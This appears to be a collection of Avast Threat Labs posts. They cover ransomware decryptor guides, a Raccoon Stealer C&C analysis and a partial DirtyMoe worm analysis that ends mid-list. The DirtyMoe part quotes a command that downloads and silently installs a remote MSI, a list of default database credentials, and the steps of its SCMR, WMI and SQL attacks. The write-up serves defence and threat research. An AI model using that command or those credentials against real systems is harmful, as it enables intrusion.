How to use the Avast decryptor to recover files

To decrypt your files, please, follow these steps:

  1. Download the free Avast decryptor. Choose a build that corresponds with your Windows installation. The 64-bit version is significantly faster and most of today’s Windows installations are 64-bit.
  2. Simply run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
  3. On the initial page, you can read the license information, if you want, but you really only need to click “Next”
  4. On the next page, select the list of locations which you want to be searched and decrypted. By default, it contains a list of all local drives:
  5. On the third page, you need to enter the name of a file encrypted by the TargetCompany ransomware. In case you have an encryption password created by a previous run of the decryptor, you can select the “I know the password for decrypting files” option:
  6. The next page is where the password cracking process takes place. Click “Start” when you are ready to start the process. During password cracking, all your available processor cores will spend most of their computing power to find the decryption password. The cracking process may take a large amount of time, up to tens of hours. The decryptor periodically saves the progress and if you interrupt it and restart the decryptor later, it offers you an option to resume the previously started cracking process. Password cracking is only needed once per PC – no need to do it again for each file.
  7. When the password is found, you can proceed to the decryption of files on your PC by clicking “Next”.
  8. On the final wizard page, you can opt-in whether you want to backup encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes.


SHA256 File Extension
98a0fe90ef04c3a7503f2b700415a50e62395853bd1bab9e75fbe75999c0769e .mallox
3f843cbffeba010445dae2b171caaa99c6b56360de5407da71210d007fe26673 .exploit
af723e236d982ceb9ca63521b80d3bee487319655c30285a078e8b529431c46e .architek
e351d4a21e6f455c6fca41ed4c410c045b136fa47d40d4f2669416ee2574124b .brg

The post Decrypted: TargetCompany Ransomware appeared first on Avast Threat Labs.

Help for Ukraine: Free decryptor for HermeticRansom ransomware

3 March 2022 at 09:07

On February 24th, the Avast Threat Labs discovered a new ransomware strain accompanying the HermeticWiper data wiper malware, which our colleagues at ESET found circulating in Ukraine. Following this naming convention, we opted to name the strain we found piggybacking on the wiper HermeticRansom. According to analysis done by Crowdstrike’s Intelligence Team, the ransomware contains a weakness in its crypto scheme and can be decrypted for free.

If your device has been infected with HermeticRansom and you’d like to decrypt your files, click here to skip to the section How to use the Avast decryptor to recover files.


The ransomware is written in the Go language. When executed, it searches local drives and network shares for potentially valuable files, looking for files with one of the extensions listed below (the order is taken from the sample):

.docx .doc .dot .odt .pdf .xls .xlsx .rtf .ppt .pptx .one .xps .pub .vsd .txt .jpg .jpeg .bmp .ico .png .gif .sql .xml .pgsql .zip .rar .exe .msi .vdi .ova .avi .dip .epub .iso .sfx .inc .contact .url .mp3 .wmv .wma .wtv .avi .acl .cfg .chm .crt .css .dat .dll .cab .htm .html .encryptedjb

In order to keep the victim’s PC operational, the ransomware avoids encrypting files in Program Files and Windows folders.

For every file designated for encryption, the ransomware creates a 32-byte encryption key. Files are encrypted by blocks, each block has 1048576 (0x100000) bytes. A maximum of nine blocks are encrypted. Any data past 9437184 bytes (0x900000) is left in plain text. Each block is encrypted by AES GCM symmetric cipher. After data encryption, the ransomware appends a file tail, containing the RSA-2048 encrypted file key. The public key is stored in the binary as a Base64 encoded string:
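In other words, only the first nine 1 MiB blocks of a file are ever touched. A small illustrative sketch (Python; the function name is ours) of which byte ranges get encrypted under this scheme:

```python
BLOCK_SIZE = 0x100000  # 1,048,576 bytes per block
MAX_BLOCKS = 9         # data past 0x900000 stays in plain text

def encrypted_ranges(file_size: int) -> list[tuple[int, int]]:
    """Return the (start, end) byte ranges of a file that get encrypted."""
    ranges = []
    for i in range(MAX_BLOCKS):
        start = i * BLOCK_SIZE
        if start >= file_size:
            break
        ranges.append((start, min(start + BLOCK_SIZE, file_size)))
    return ranges

# A 10 MiB file: only the first 9 MiB (nine blocks) is encrypted
assert len(encrypted_ranges(10 * 1024 * 1024)) == 9
```

This partial-encryption approach is a common ransomware speed optimization: it renders large files unusable while keeping encryption fast.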

Encrypted file names are given extra suffix:

.[[email protected]].encryptedJB

When done, a file named “read_me.html” is saved to the user’s Desktop folder:

There is an interesting amount of politically oriented strings in the ransomware binary. In addition to the file extension, referring to the re-election of Joe Biden in 2024, there is also a reference to him in the project name:

During execution, the ransomware creates a large number of child processes that do the actual encryption:

How to use the Avast decryptor to recover files

To decrypt your files, please, follow these steps:

  1. Download the free Avast decryptor.
  2. Simply run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
  3. On the initial page, you can read the license information, if you want, but you really only need to click “Next”.
  4. On the next page, select the list of locations which you want to be searched and decrypted. By default, it contains a list of all local drives:
  5. On the final wizard page, you can opt-in whether you want to backup encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes.


SHA256: 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382

The post Help for Ukraine: Free decryptor for HermeticRansom ransomware appeared first on Avast Threat Labs.

Decrypted: Prometheus Ransomware

9 March 2022 at 11:02

Avast Releases Decryptor for the Prometheus Ransomware. Prometheus is a ransomware strain written in C# that inherited a lot of code from an older strain called Thanos.

Skip to how to use the Prometheus ransomware decryptor

How Prometheus Works

Prometheus tries to thwart malware analysis by killing various analysis processes, such as packet sniffers, debuggers, and tools for inspecting PE files. Then, it generates a random password that is used during the Salsa20 encryption.

Prometheus looks for available local drives to encrypt files that have one of the following  extensions:

db dbf accdb dbx mdb mdf epf ndf ldf 1cd sdf nsf fp7 cat log dat txt jpeg gif jpg png php cs cpp rar zip html htm xlsx xls avi mp4 ppt doc docx sxi sxw odt hwp tar bz2 mkv eml msg ost pst edb sql odb myd php java cpp pas asm key pfx pem p12 csr gpg aes vsd odg raw nef svg psd vmx vmdk vdi lay6 sqlite3 sqlitedb java class mpeg djvu tiff backup pdf cert docm xlsm dwg bak qbw nd tlg lgb pptx mov xdw ods wav mp3 aiff flac m4a csv sql ora dtsx rdl dim mrimg qbb rtf 7z 

Encrypted files are given a new extension .[ID-<PC-ID>].unlock. After the encryption process is completed, Notepad is executed with a ransom note from the file UNLOCK_FILES_INFO.txt informing victims on how to pay the ransom if they want to decrypt their files.

How to use the Avast decryptor to decrypt files encrypted by Prometheus Ransomware

To decrypt your files, follow these steps:

  1. Download the free Avast decryptor.
  2. Run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
  3. On the initial page, you can read the license information, if you want, but you really only need to click “Next”.
  4. On the next page, select the list of locations you want to be searched and decrypted. By default, it contains a list of all local drives:
  5. On the third page, you need to provide a file in its original form and encrypted by the Prometheus ransomware. Enter both names of the files. In case you have an encryption password created by a previous run of the decryptor, you can select the “I know the password for decrypting files” option:
  6. The next page is where the password cracking process takes place. Click “Start” when you are ready to start the process. During the password cracking process, all your available processor cores will spend most of their computing power to find the decryption password. The cracking process may take a large amount of time, up to tens of hours. The decryptor periodically saves the progress and if you interrupt it and restart the decryptor later, it offers you the option to resume the previously started cracking process. Password cracking is only needed once per PC – no need to do it again for each file.
  7. When the password is found, you can proceed to decrypt all encrypted files on your PC by clicking “Next”.
  8. On the final page, you can opt-in to backup encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.


SHA256 File Extension
742bc4e78c36518f1516ece60b948774990635d91d314178a7eae79d2bfc23b0 .[ID-<HARDWARE_ID>].unlock

The post Decrypted: Prometheus Ransomware appeared first on Avast Threat Labs.

Raccoon Stealer: “Trash panda” abuses Telegram

9 March 2022 at 13:48

We recently came across a stealer, called Raccoon Stealer, a name given to it by its author. Raccoon Stealer uses the Telegram infrastructure to store and update actual C&C addresses. 

Raccoon Stealer is a password stealer capable of stealing not just passwords, but various types of data, including:

  • Cookies, saved logins and forms data from browsers
  • Login credentials from email clients and messengers
  • Files from crypto wallets
  • Data from browser plugins and extensions
  • Arbitrary files based on commands from C&C

In addition, it’s able to download and execute arbitrary files by command from its C&C. In combination with active development and promotion on underground forums, Raccoon Stealer is prevalent and dangerous.

The oldest samples of Raccoon Stealer we’ve seen have timestamps from the end of April 2019, and its authors state they started selling the malware on underground forums that same month. Since then, it has been updated many times; according to its authors, they fixed bugs, added features, and more.


We’ve seen Raccoon distributed via downloaders: Buer Loader and GCleaner. Based on some samples, we believe it is also being distributed in the form of fake game cheats, patches for cracked software (including hacks and mods for Fortnite, Valorant, and NBA2K22), or other software. Taking into account that Raccoon Stealer is for sale, its distribution techniques are limited only by the imagination of the end buyers. Some samples are spread unpacked, while some are protected using Themida or malware packers. Worth noting is that some samples were packed more than five times in a row with the same packer!

Technical details

Raccoon Stealer is written in C/C++ and built using Visual Studio. Samples are about 580-600 kB in size. The code quality is below average; some strings are encrypted, some are not.

Once executed, Raccoon Stealer starts by checking the default user locale set on the infected device and won’t work if it’s one of the following:

  • Russian
  • Ukrainian
  • Belarusian
  • Kazakh
  • Kyrgyz
  • Armenian
  • Tajik
  • Uzbek

C&C communications

The most interesting thing about this stealer is its communication with C&Cs. There are four values crucial for its C&C communication, which are hardcoded in every Raccoon Stealer sample:

  • MAIN_KEY. This value has been changed four times during the year.
  • URLs of Telegram gates with a channel name. Gates are used to avoid implementing the complicated Telegram protocol and to avoid storing any credentials inside the samples
  • BotID – a hexadecimal string sent to the C&C every time
  • TELEGRAM_KEY – a key to decrypt the C&C address obtained from Telegram Gate

Let’s look at an example to see how it works:
447c03cc63a420c07875132d35ef027adec98e7bd446cf4f7c9d45b6af40ea2b unpacked to:

  1. First of all, the MAIN_KEY is decrypted. See the decryption code in the image below:

In this example, the MAIN_KEY is jY1aN3zZ2j. This key is used to decrypt the Telegram Gate URLs and the BotID.

  2. Next, the sample decodes and decrypts the Telegram Gate URLs. They are stored in the sample as: Rf66cjXWSDBo1vlrnxFnlmWs5Hi29V1kU8o8g8VtcKby7dXlgh1EIweq4Q9e3PZJl3bZKVJok2GgpA90j35LVd34QAiXtpeV2UZQS5VrcO7UWo0E1JOzwI0Zqrdk9jzEGQIEzdvSl5HWSzlFRuIjBmOLmgH/V84PCRFevc40ZuTAZUq+q1JywL+G/1xzXQdYZiKWea8ODgaN+4B8cT3AqbHmY5+6MHEBWTqTsITPAxKdPMu3dC9nwdBF3nlvmX4/q/gSPflYF7aIU1wFhZxViWq2
    After decoding the Base64, it has this form:

Decrypting this binary data with RC4 using the MAIN_KEY gives us a string with the Telegram Gates:

  3. The stealer then has to obtain its real C&C. To do so, it requests a Telegram Gate, which returns an HTML page:

Here you can see a Telegram channel name and its status in Base64: e74b2mD/ry6GYdwNuXl10SYoVBR7/tFgp2f-v32
The prefix (always five characters) and postfix (always six characters) are removed, leaving mD/ry6GYdwNuXl10SYoVBR7/tFgp. The Base64 is then decoded to obtain an encrypted C&C URL:

The TELEGRAM_KEY in this sample is the string 739b4887457d3ffa7b811ce0d03315ce, and Raccoon uses it as the key for the RC4 algorithm to finally decrypt the C&C URL: http://91.219.236[.]18/

  4. Raccoon builds a query string with PC information (machine GUID and user name) and the BotID.
  5. The query string is encrypted with RC4 using the MAIN_KEY and then encoded with Base64.
  6. This data is sent via POST to the C&C, and the response is encoded with Base64 and encrypted with the MAIN_KEY. It is actually JSON with a lot of parameters, and it looks like this:

Thus, the Telegram infrastructure is used to store and update actual C&C addresses. It looks quite convenient and reliable until Telegram decides to take action. 
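The decryption chain from the steps above (strip the five-character prefix and six-character postfix from the channel status, Base64-decode, then RC4-decrypt with the TELEGRAM_KEY) can be sketched as follows (Python, illustrative only; the URL below is a stand-in, not real C&C material):

```python
import base64

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA), as Raccoon uses with its MAIN_KEY / TELEGRAM_KEY."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def decrypt_c2(channel_status: str, telegram_key: bytes) -> bytes:
    """Strip the 5-char prefix and 6-char postfix, Base64-decode, RC4-decrypt."""
    trimmed = channel_status[5:-6]
    return rc4(telegram_key, base64.b64decode(trimmed))

# Round-trip demo with the TELEGRAM_KEY from the analyzed sample and a fake URL
key = b"739b4887457d3ffa7b811ce0d03315ce"
fake_url = b"http://example.invalid/"
status = "AAAAA" + base64.b64encode(rc4(key, fake_url)).decode() + "BBBBBB"
assert decrypt_c2(status, key) == fake_url
```

Because RC4 is symmetric, the same routine serves both for decrypting the C&C address and for encrypting the query string sent back to the C&C.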


The people behind Raccoon Stealer

Based on our analysis of seller messages on underground forums, we can deduce some information about the people behind the malware. Raccoon Stealer was developed by a team; some (or maybe all) members of the team are native Russian speakers. Messages on the forum are written in Russian, and we assume they are from former USSR countries because they try to prevent the stealer from targeting users in these countries.

Possible names/nicknames of group members can be inferred from artifacts found in the samples:

  • C:\Users\a13xuiop1337\
  • C:\Users\David\ 


Raccoon Stealer is quite prevalent: from March 3, 2021 to February 17, 2022, our systems detected more than 25,000 Raccoon-related samples. We identified more than 1,300 distinct configs during that period.

Here is a map showing the number of systems Avast protected from Raccoon Stealer from March 3, 2021 to February 17, 2022. In this time frame, Avast protected users against nearly 600,000 Raccoon Stealer attacks.

The country where we have blocked the most attempts is Russia, which is interesting because the actors behind the malware don’t want to infect computers in Russia or Central Asia. We believe the attackers spray and pray, distributing the malware around the world. Only once it makes it onto a system does it check the default locale; if the locale is one of the languages listed above, the malware won’t run. This explains why we detected so many attack attempts in Russia: we block the malware before it can run, i.e. before it can even get to the stage where it checks the device’s locale. If an unprotected device in Russia comes across the malware with its locale set to English, or any other language not on the exception list, it would still become infected.

Screenshot with claims about not working with CIS

Telegram Channels

From the more than 1,300 distinct configs we extracted, 429 of them are unique Telegram channels. Some of them were used only in a single config, others were used dozens of times. The most used channels were:

  • jdiamond13 – 122 times
  • jjbadb0y – 44 times
  • nixsmasterbaks2 – 31 times
  • hellobyegain – 25 times
  • h_smurf1kman_1  – 24 times

Thus, the five most used channels were found in about 19% of configs.

Malware distributed by Raccoon

As previously mentioned, Raccoon Stealer is able to download and execute arbitrary files on command from the C&C. We managed to collect 185 of these files, with a total size of 265 MB. Some of the groups are:

  • Downloaders – used to download and execute other files
  • Clipboard crypto stealers – change crypto wallet addresses in the clipboard – very popular (more than 10%)
  • WhiteBlackCrypt Ransomware

Servers used to download this software

We extracted unique links to other malware from the Raccoon configs received from C&Cs, yielding 196 unique URLs. Some analysis results:

  • 43% of the URLs use the HTTP scheme, 57% HTTPS.
  • 83 domain names were used.
  • About 20% of the malware was placed on the Discord CDN.
  • About 10% was served from aun3xk17k[.]space.


We will continue to monitor Raccoon Stealer’s activity, keeping an eye on new C&Cs, Telegram channels, and downloaded samples. We predict it may be used more widely by other cybercrime groups. We assume the group behind Raccoon Stealer will continue to develop new features, including support for stealing data from additional software, as well as for bypassing the protections that software has in place.



The post Raccoon Stealer: “Trash panda” abuses Telegram appeared first on Avast Threat Labs.

DirtyMoe: Worming Modules

16 March 2022 at 12:36

The DirtyMoe malware is deployed using various kits like PurpleFox or injected installers of Telegram Messenger that require user interaction. Complementary to this deployment, one of the DirtyMoe modules expands the malware using worm-like techniques that require no user interaction.

This research analyzes the worming module’s kill chain and the procedures used to launch and control the module through the DirtyMoe service. Other areas investigated include evaluating the risk of the identified exploits used by the worm and a detailed analysis of how its victim selection algorithm works. Finally, we examine its performance and provide a thorough examination of the entire worming workflow.

The analysis showed that the worming module targets older well-known vulnerabilities, e.g., EternalBlue and Hot Potato Windows Privilege Escalation. Another important discovery is a dictionary attack using Service Control Manager Remote Protocol (SCMR), WMI, and MS SQL services. Finally, an equally critical outcome is discovering the algorithm that generates victim target IP addresses based on the worming module’s geographical location.

One worm module can generate and attack hundreds of thousands of private and public IP addresses per day; many victims are at risk since many machines still use unpatched systems or weak passwords. Furthermore, the DirtyMoe malware uses a modular design; consequently, we expect other worming modules to be added to target prevalent vulnerabilities.

1. Introduction

DirtyMoe, the successful malware we documented in detail in the previous series, also implements mechanisms to reproduce itself. The most common way of deploying the DirtyMoe malware is via phishing campaigns or malvertising. In this series, we will focus on techniques that help DirtyMoe to spread in the wild.

The PurpleFox exploit kit (EK) is the most frequently observed approach to deploy DirtyMoe; the immediate focus of PurpleFox EK is to exploit a victim machine and install DirtyMoe. PurpleFox EK primarily abuses vulnerabilities in the Internet Explorer browser via phishing emails or popunder ads. For example, Guardicore described a worm spread by PurpleFox that abuses SMB services with weak passwords [2], infiltrating poorly secured systems. Recently, Minerva Labs has described the new infection vector installing DirtyMoe via an injected Telegram Installer [1].

Currently, we are monitoring three approaches used to spread DirtyMoe in the wild; Figure 1 illustrates the relationship between the individual concepts. The primary function of the DirtyMoe malware is crypto-mining; it is deployed to victims’ machines using different techniques. We have observed PurpleFox EK, the PurpleFox Worm, and injected Telegram Installers used as mediums to spread and install DirtyMoe; we consider it highly likely that other mechanisms are used in the wild.

Figure 1. Mediums of DirtyMoe

In the fourth article of this series, we described the deployment of the DirtyMoe service. Figure 2 illustrates the DirtyMoe hierarchy. The DirtyMoe service runs as a svchost process that starts two other processes: DirtyMoe Core and Executioner, which manages DirtyMoe modules. Typically, the executioner loads two modules: one for Monero mining and the other for worming replication.

Figure 2. DirtyMoe hierarchy

Our research has been focused on worming since it seems that worming is one of the main mediums to spread the DirtyMoe malware. The PurpleFox worm described by Guardicore [2] is just the tip of the worming iceberg because DirtyMoe utilizes sophisticated algorithms and methods to spread itself into the wild and even to spread laterally in the local network.

The goal of the DirtyMoe worm is to exploit a target system and install itself onto the victim machine. The DirtyMoe worm abuses several known vulnerabilities, as follows:

  • CVE-2019-9082: ThinkPHP – Multiple PHP Injection RCEs
  • CVE-2019-2725: Oracle Weblogic Server – ‘AsyncResponseService’ Deserialization RCE
  • CVE-2019-1458: WizardOpium Local Privilege Escalation
  • CVE-2018-0147: Deserialization Vulnerability
  • CVE-2017-0144: EternalBlue SMB Remote Code Execution (MS17-010)
  • MS15-076: RCE Allow Elevation of Privilege (Hot Potato Windows Privilege Escalation)
  • Dictionary attacks against MS SQL Servers, SMB, and Windows Management Instrumentation (WMI)

The prevalence of DirtyMoe is increasing in all corners of the world; this may be due to the DirtyMoe worm’s strategy of generating targets using a pseudo-random IP generator that considers the worm’s geographical and local location. A consequence of this technique is that the worm is more flexible and effective in its location. In addition, DirtyMoe can be expanded to machines hidden behind NAT, as this strategy also provides lateral movement in local networks. A single DirtyMoe instance can generate and attack up to 6,000 IP addresses per second.

The insidiousness of the whole worm’s design is its modularization controlled by C&C servers. For example, DirtyMoe has a few worming modules targeting a specific vulnerability, and C&C determines which worming module will be applied based on information sent by a DirtyMoe instance.

The DirtyMoe worming module implements three basic phases common to all types of vulnerabilities. In the initial phase, the module generates a list of IP addresses to target. The second phase attacks specific vulnerabilities on these targets. Finally, the module performs dictionary attacks against the live machines represented by the randomly generated IP addresses. The most common modules that we have observed are SMB and SQL.

This article focuses on the DirtyMoe worming module. We analyze and discuss the worming strategy, which exploits are abused by the malware author, and a module behavior according to geological locations. One of the main topics is the performance of IP address generation, which is crucial for the malware’s success. We are also looking for specific implementations of abused exploits, including their origins.

2. Worm Kill Chain

We can describe the general workflow of the DirtyMoe worming module through the kill chain. Figure 3 illustrates stages of the worming workflow.

Figure 3. Worming module workflow

The worming module generates targets at random but also considers the geolocation of the module. Each generated target is tested for the presence of vulnerable service versions; the module connects to the specific port where attackers expect vulnerable services and verifies whether the victim’s machine is live. If the verification is successful, the worming module collects basic information about the victim’s OS and versions of targeted services.

The C&C server appears to determine which specific module is used for worming without using any of the victim’s information. Currently, we do not know precisely what algorithm is used for module choice, but we suspect it depends on additional information sent to the C&C server.

When the module verifies that a targeted victim’s machine is potentially exploitable, an appropriate payload is prepared, and an attack is started. The payload must be modified for each attack since a remote code execution (RCE) command is valid only for a few minutes.

In this kill chain phase, the worming module sends the prepared payload. The payload delivery is typically performed using protocols of targeted services, e.g., SMB or MS SQL protocols.

Exploitation and Installation
If the payload is correct and the victim’s machine is successfully exploited, the RCE command included in the payload is run. Consequently, the DirtyMoe malware is deployed, as was detailed in the previous article (DirtyMoe: Deployment).

3. RCE Command

The main goal of the worming module is to achieve RCE under administrator privileges and install a new DirtyMoe instance. The general form of the executed command (@[email protected]) is the same for each worming module:
Cmd /c for /d %i in (@[email protected]) do Msiexec /i http://%i/@[email protected] /Q

The command usually iterates through three IP addresses of C&C servers, including ports. The IPs are represented by the placeholder @[email protected], which is filled in at runtime. Practically, @[email protected] is regenerated for each payload sent, since the IPs are rotated every minute utilizing sophisticated algorithms; this was described in Section 2 of the first blog post.

The second placeholder is @[email protected], representing the DirtyMoe object’s name; this is, in fact, an MSI installer package. The package filename is in the form of a hash – [A-F0-9]{8}\.moe. The hash name is generated using a hardcoded hash table, methods for rotations and substrings, and the MS_RPC_<n> string, where n is a number determined by the DirtyMoe service.

The core of the @[email protected] command is the execution of the remote DirtyMoe object (http://) via msiexec in silent mode (/Q). An example of a specific @[email protected] command is:
Cmd /c for /d %i in ( do Msiexec /i http://%i/ /Q

4. IP Address Generation

The key feature of the worming module is the generation of IP addresses (IPs) to attack. There are six methods used to generate IPs with the help of a pseudo-random generator; each method focuses on a different IPv4 class. Accordingly, this contributes to a globally uniform distribution of attacked machines and enables the generation of more usable target IP addresses.

4.1 Class B from IP Table

The most significant proportion of generated addresses is provided by 10 threads generating IPs using a hardcoded list of 24,622 items. Each list item is in the form 0xXXXX0000, representing an IP range of Class B. Each thread generates IPs based on the following algorithm:

The algorithm randomly selects a Class B address from the list and, 65,536 times, generates an entirely random number that is added to the selected Class B address. The effect is that the final IP addresses generated are based on the geographical locations hardcoded in the list.
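A minimal Python sketch of this Class B generation, assuming a table of 0xXXXX0000 entries (the values below are illustrative, not taken from the malware):

```python
import random

# Hypothetical subset of the module's hardcoded 24,622-entry table;
# each entry is a Class B network in the form 0xXXXX0000.
CLASS_B_TABLE = [0x3E590000, 0x2D4C0000, 0x5BCD0000]  # illustrative values only

def generate_class_b_targets(table, count=65536):
    """Pick a random Class B entry and yield `count` addresses with
    random lower 16 bits added to the selected base."""
    base = random.choice(table)
    for _ in range(count):
        low = random.randint(0, 0xFFFF)  # random host part
        ip = base | low
        yield "%d.%d.%d.%d" % (ip >> 24, (ip >> 16) & 0xFF,
                               (ip >> 8) & 0xFF, ip & 0xFF)
```

Because the upper 16 bits always come from the table, the generated targets inherit the geographical distribution of the hardcoded list.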

Figure 4 shows the geographical distribution of the hardcoded addresses. The continent distribution is separated into four parts: Asia, North America, Europe, and others (South America, Africa, Oceania). We verified this approach and generated 1M addresses using the algorithm. The result has a similar continental distribution; hence, the implementation ensures that the IP address distribution is uniform.

Figure 4. Geographical distribution of hardcoded Class B IPs
4.2 Fully Random IP

The other three threads generate completely random IPs, so the geographical position is also entirely random. However, the fully random IP algorithm generates low classes more frequently, as shown in the algorithm below.
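The module’s exact random-number routine is not reproduced here. As an illustration only, the sketch below shows one way such a bias toward low classes can arise: composing the 32-bit address from 15-bit rand()-style outputs (this composition is our assumption, not a confirmed detail of the module):

```python
import random

def rand15():
    # Emulates a C rand() bounded by RAND_MAX = 32767 (15 bits).
    return random.randint(0, 0x7FFF)

def fully_random_ip():
    # Assumption: building the address from two 15-bit values leaves the
    # top bit of the first octet clear, so only addresses with a first
    # octet of 0-127 (the historical Class A range) are ever produced --
    # one plausible cause of the "low classes more frequently" behavior.
    ip = (rand15() << 16) | rand15()
    return "%d.%d.%d.%d" % (ip >> 24, (ip >> 16) & 0xFF,
                            (ip >> 8) & 0xFF, ip & 0xFF)
```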

4.3 Derived Classes A, B, C

Three other algorithms generate IPs based on an IP address of a machine (IPm) where the worming module runs. Consequently, the worming module targets machines in the nearby surroundings.

Addresses are derived from the IPm masked to the appropriate Class A/B/C, and a random number representing the lower Class is added; as shown in the following pseudo-code.
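The derivation above can be sketched as follows (function names are ours; IPm is passed as a 32-bit integer):

```python
import random

def derive_target(ipm, klass):
    """Mask the module's own IP (ipm) to Class A/B/C and add a random
    lower part, so targets stay in the module's neighborhood."""
    masks = {"A": 0xFF000000, "B": 0xFFFF0000, "C": 0xFFFFFF00}
    mask = masks[klass]
    base = ipm & mask                               # keep the class prefix
    low = random.randint(0, (~mask) & 0xFFFFFFFF)   # randomize the rest
    return base | low
```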

4.4 Derived Local IPs

The last IP generating method is represented by one thread that scans interfaces attached to local networks. The worming module lists local IPs using gethostbyname() and processes one local address every two hours.

Each local IP is masked to Class C, and 255 new local addresses are generated based on the masked address. As a result, the worming module attacks all local machines close to the infected machine in the local network.
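The local Class C expansion can be sketched as follows (names are ours; the module itself enumerates local IPs via gethostbyname()):

```python
import socket

def local_class_c_targets(local_ip):
    """Mask a local IP to Class C and emit the 255 host addresses
    .1-.255 derived from the masked base."""
    packed = int.from_bytes(socket.inet_aton(local_ip), "big")
    base = packed & 0xFFFFFF00
    for host in range(1, 256):
        yield socket.inet_ntoa((base | host).to_bytes(4, "big"))
```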

5. Attacks to Abused Vulnerabilities

We have detected two worming modules which primarily attack SMB services and MS SQL databases. Our team has been lucky since we also discovered something rare: a worming module, still under development, containing exploits targeting PHP, Java Deserialization, and Oracle Weblogic Server. In addition, the worming modules include a packed dictionary of 100,000 words used for dictionary attacks.

5.1 EternalBlue

One of the main vulnerabilities exploited is CVE-2017-0144: EternalBlue SMB Remote Code Execution (patched by Microsoft in MS17-010). It is still bewildering how many EternalBlue attacks are observed – Avast is still blocking approximately 20 million EternalBlue attack attempts every month.

The worming module focuses on Windows versions from Windows XP to Windows 8. We have identified that the EternalBlue implementation is the same as the one described on exploit-db [3], and the effective payload including the @[email protected] command is identical to DoublePulsar [4]. Interestingly, the whole EternalBlue payload is hardcoded for each Windows architecture, although the payload could be composed for each platform separately.

5.2 Service Control Manager Remote Protocol

No known vulnerability is used in the case of Service Control Manager Remote Protocol (SCMR) [5]. The worming module attacks SCMR through a dictionary attack. The first phase is to guess an administrator password. The details of the dictionary attack are described in Section 6.4.

If the dictionary attack is successful and the module guesses the password, a new Windows service is created and started remotely via RPC over the SMB service. Figure 5 illustrates the network communication of the attack. Binding to SCMR is identified using the UUID {367ABB81-9844-35F1-AD32-98F038001003}. The worming module, acting as a client, writes commands to the \PIPE\svcctl pipe on the server side. The first batch of commands creates a new service and registers a command with the malicious @[email protected] payload. The new service is started and then deleted in an attempt to cover its tracks.

The Microsoft HTML Application Host (mshta.exe) is used as a LOLBin to create a ShellWindows object and run @[email protected]. The advantage of this proxy execution is that mshta.exe is typically marked as trusted; some defenders may not detect this misuse of mshta.exe.

Figure 5. SCMR network communications

Windows records these suspicious events in the System event log, as shown in Figure 6. The service name is in the form AC<number>, and the number is incremented for each successful attack. It is also worth noting that ImagePath contains the @[email protected] command sent to SCMR in BinaryPathName; see Figure 5.

Figure 6. Event log for SCMR
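Defenders can hunt for this artifact. Below is a minimal sketch based only on the observed AC<number> service names and the msiexec-based ImagePath; the helper name and matching logic are ours, not a detection rule shipped by any product:

```python
import re

# Matches the AC<number> naming scheme observed for the rogue services.
SERVICE_NAME = re.compile(r"^AC\d+$")

def looks_like_dirtymoe_service(name, image_path):
    """Flag a service whose name matches AC<number> and whose ImagePath
    invokes msiexec, as seen in the SCMR attack's event-log traces."""
    return bool(SERVICE_NAME.match(name)) and "msiexec" in image_path.lower()
```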
5.3 Windows Management Instrumentation

The second method that does not misuse any known vulnerability is a dictionary attack against Windows Management Instrumentation (WMI). The workflow is similar to the SCMR attack: first, the worming module must guess the password of a victim administrator account. The details of the dictionary attack are described in Section 6.4.

The attackers can use WMI to manage and access data and resources on remote computers [6]. If they have an account with administrator privileges, full access to all system resources is available remotely.

The malicious misuse lies in the creation of a new process that runs @[email protected] via a WMI script; see Figure 7. DirtyMoe is then installed in the following six steps:

  1. Initialize the COM library.
  2. Connect to the default namespace root/cimv2 containing the WMI classes for management.
  3. The Win32_Process class is created, and @[email protected] is set up as a command-line argument.
  4. Win32_ProcessStartup represents the startup configuration of the new process. The worming module sets the process window to a hidden state, so the execution is completely silent.
  5. The new process is started, and the DirtyMoe installer is run.
  6. Finally, the WMI script is finished, and the COM library is cleaned up.
Figure 7. WMI script creating a Win32_Process launching the @[email protected] command
5.4 Microsoft SQL Server

Attacks on Microsoft SQL Servers are the second most widespread attack performed by the worming modules. The targeted MS SQL Server versions are 2000, 2005, 2008, 2012, 2014, 2016, 2017, and 2019.

The worming module also does not abuse any vulnerability related to MS SQL. However, it uses a combination of the dictionary attack and MS15-076: “RCE Allow Elevation of Privilege” known as “Hot Potato Windows Privilege Escalation”. Additionally, the malware authors utilize the MS15-076 implementation known as Tater, the PowerSploit function Invoke-ReflectivePEInjection, and CVE-2019-1458: “WizardOpium Local Privilege Escalation” exploit.

The first stage of the MS SQL attack is to guess the password of an attacked MS SQL server. The first batch of username/password pairs is hardcoded. The malware authors have collected the hardcoded credentials from publicly available sources. It contains fifteen default passwords for a few databases and systems like Nette Database, Oracle, Firebird, Kingdee KIS, etc. The complete hardcoded credentials are as follows: 401hk/[email protected]_, admin/admin, bizbox/bizbox, bwsa/bw99588399, hbv7/[email protected], kisadmin/ypbwkfyjhyhgzj, neterp/neterp, ps/740316, root/root, sp/sp, su/[email protected]_, sysdba/masterkey, uep/U_tywg_2008, unierp/unierp, vice/vice.

If the first batch is not successful, the worming module attacks using the hardcoded dictionary. The detailed workflow of the dictionary attack is described in Section 6.4.

If the module successfully guesses the username/password of the attacked MS SQL server, the module executes corresponding payloads based on the Transact-SQL procedures. There are five methods launched one after another.

  1. sp_start_job
    The module creates, schedules, and immediately runs a task with Payload 1.
  2. sp_makewebtask
    The module creates a task that produces an HTML document containing Payload 2.
  3. sp_OAMethod
